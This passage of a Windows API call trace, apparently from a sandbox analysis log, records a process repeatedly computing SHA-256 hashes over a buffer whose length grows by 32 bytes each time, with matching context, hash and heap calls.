	[0187.419] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.419] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.419] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0187.419] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.419] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ed88
	[0187.419] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ed88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ed88, pdwDataLen=0x128aac) returned 1
	[0187.419] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.419] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.419] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.420] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.420] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0187.420] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.420] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272edb0
	[0187.420] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272edb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272edb0, pdwDataLen=0x128aac) returned 1
	[0187.420] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.420] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.420] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.420] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.420] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0187.420] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.420] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272edd8
	[0187.420] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272edd8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272edd8, pdwDataLen=0x128aac) returned 1
	[0187.420] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.420] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.420] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.421] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.421] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0187.421] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.421] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ee00
	[0187.421] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ee00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ee00, pdwDataLen=0x128aac) returned 1
	[0187.421] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.421] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.421] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.421] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.421] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0187.421] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.421] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ee28
	[0187.421] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ee28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ee28, pdwDataLen=0x128aac) returned 1
	[0187.421] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.421] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.421] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.422] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.422] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0187.422] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.422] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ee50
	[0187.422] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ee50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ee50, pdwDataLen=0x128aac) returned 1
	[0187.422] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.422] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.422] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.422] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.422] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0187.422] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.422] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ee78
	[0187.422] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ee78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ee78, pdwDataLen=0x128aac) returned 1
	[0187.422] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.422] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.422] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.423] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.423] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0187.423] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eea0
	[0187.423] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272eea0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eea0, pdwDataLen=0x128aac) returned 1
	[0187.423] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.423] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.423] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.423] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.423] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0187.423] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eec8
	[0187.423] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272eec8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eec8, pdwDataLen=0x128aac) returned 1
	[0187.423] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.423] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.423] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.424] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.424] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0187.424] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eef0
	[0187.424] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272eef0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eef0, pdwDataLen=0x128aac) returned 1
	[0187.424] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.424] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.424] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.424] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.424] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0187.424] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ef18
	[0187.424] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ef18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ef18, pdwDataLen=0x128aac) returned 1
	[0187.424] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.424] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.424] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.425] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.425] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0187.425] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ef40
	[0187.425] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ef40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ef40, pdwDataLen=0x128aac) returned 1
	[0187.425] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.425] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.425] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.425] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.425] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0187.425] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.425] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ef68
	[0187.425] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ef68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ef68, pdwDataLen=0x128aac) returned 1
	[0187.425] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.425] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.425] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.426] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.426] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0187.426] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.426] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ef90
	[0187.426] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ef90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ef90, pdwDataLen=0x128aac) returned 1
	[0187.426] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.426] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.426] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.426] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.426] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0187.426] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.426] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272efb8
	[0187.426] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272efb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272efb8, pdwDataLen=0x128aac) returned 1
	[0187.426] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.426] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.426] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.427] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.427] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0187.427] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272efe0
	[0187.427] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272efe0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272efe0, pdwDataLen=0x128aac) returned 1
	[0187.427] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.427] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.427] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.427] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.427] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0187.427] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.427] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f008
	[0187.427] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f008, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f008, pdwDataLen=0x128aac) returned 1
	[0187.427] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.427] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.427] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.428] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.428] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0187.428] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.428] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f030
	[0187.428] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f030, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f030, pdwDataLen=0x128aac) returned 1
	[0187.428] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.428] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.428] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.428] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.428] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0187.428] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.428] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f058
	[0187.428] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f058, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f058, pdwDataLen=0x128aac) returned 1
	[0187.428] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.428] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.428] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.429] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.429] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0187.429] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.429] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f080
	[0187.429] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f080, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f080, pdwDataLen=0x128aac) returned 1
	[0187.429] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.429] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.429] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.429] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.429] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0187.429] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.429] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f0a8
	[0187.429] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f0a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f0a8, pdwDataLen=0x128aac) returned 1
	[0187.429] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.429] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.429] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.430] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.430] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0187.430] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.430] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f0d0
	[0187.430] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f0d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f0d0, pdwDataLen=0x128aac) returned 1
	[0187.430] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.430] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.430] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.430] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.430] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0187.430] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.430] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f0f8
	[0187.430] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f0f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f0f8, pdwDataLen=0x128aac) returned 1
	[0187.430] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.430] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.431] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.431] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.431] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0187.431] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.431] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f120
	[0187.431] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f120, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f120, pdwDataLen=0x128aac) returned 1
	[0187.431] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.431] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.431] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.431] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.431] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0187.431] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f148
	[0187.432] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f148, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f148, pdwDataLen=0x128aac) returned 1
	[0187.432] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.432] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
